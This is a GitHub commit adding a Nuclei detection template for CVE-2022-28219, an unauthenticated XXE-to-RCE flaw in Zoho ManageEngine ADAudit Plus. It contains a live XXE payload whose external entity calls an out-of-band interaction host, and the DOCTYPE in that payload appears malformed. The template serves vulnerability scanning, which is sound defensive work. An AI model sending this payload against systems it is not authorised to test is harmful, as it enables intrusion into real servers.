Add CVE-2022-28219 (#4705)

patch-1
Dwi Siswanto 2022-06-30 12:41:59 +07:00 committed by GitHub
parent 18b0f909a8
commit b2a386d636
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 42 additions and 0 deletions

View File

@ -0,0 +1,42 @@
id: CVE-2022-28219
info:
name: Unauthenticated XXE to RCE in Zoho ManageEngine ADAudit Plus
author: dwisiswant0
severity: critical
description: |
Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an
unauthenticated XXE attack that leads to Remote Code Execution.
This template supports the detection part only, to achieve an
XXE to RCE, see reference[2].
reference:
- https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
- https://www.horizon3.ai/red-team-blog-cve-2022-28219/
remediation: |
Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
is configured with a dedicated service account with restricted privileges.
tags: cve,cve2022,xxe,rce,zoho,manageengine
requests:
- method: POST
path:
- "{{BaseURL}}/api/agent/tabs/agentData"
headers:
Content-Type: application/json
body: |
[
{
"DomainName": "{{Host}}",
"EventCode": 4688,
"EventType": 0,
"TimeGenerated": 0,
"Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
}
]
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"